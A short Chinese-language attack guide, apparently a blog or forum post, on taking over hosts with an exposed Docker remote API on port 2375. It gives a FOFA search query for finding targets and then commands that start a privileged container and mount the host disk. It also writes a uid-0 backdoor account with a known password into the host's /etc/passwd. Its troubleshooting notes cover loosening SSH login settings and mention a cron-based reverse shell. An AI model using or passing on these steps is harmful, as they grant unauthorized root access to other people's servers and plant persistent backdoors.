1、fofa关键字 port=“2375” && body=“page not found”

2、docker -H tcp://ip:port 可查看到当前所有的实例

3、docker -H tcp://ip:port pull alpine

4、docker -H tcp://ip:port run -it --privileged alpine bin/sh

5、fdisk -l 查看其分区结构

6、创建一个test目录，并且将其 /dev/vda2 挂载至test

7、通过whoami 和id可查看到当前的权限是root

8、cat /etc/passwd 查看当前所有的用户信息

9、通过如下命令强制将账号sql 密码123 写入其passwd文件
echo “sql:LRxM3nP3LOiYU:0:0:hello:/root:/bin/bash” >> /test/etc/passwd

10、现在即可通过新加的账号sql:123去ssh连接，此时已经成功连接上

常见问题：
1、挂载其分区后并未能将账号加进去，原因是你挂载的分区可能不是其主节点，尝试挂载其他分区
2、成功写入账号后无法ssh连接，可通过cat test/etc/ssh/ssh_config 看起ssh配置文件是否限制了ssh账号密码登录，如果是可直接通过vi命令改回来
3、可通过定时任务的方式反弹shell，解决一切难题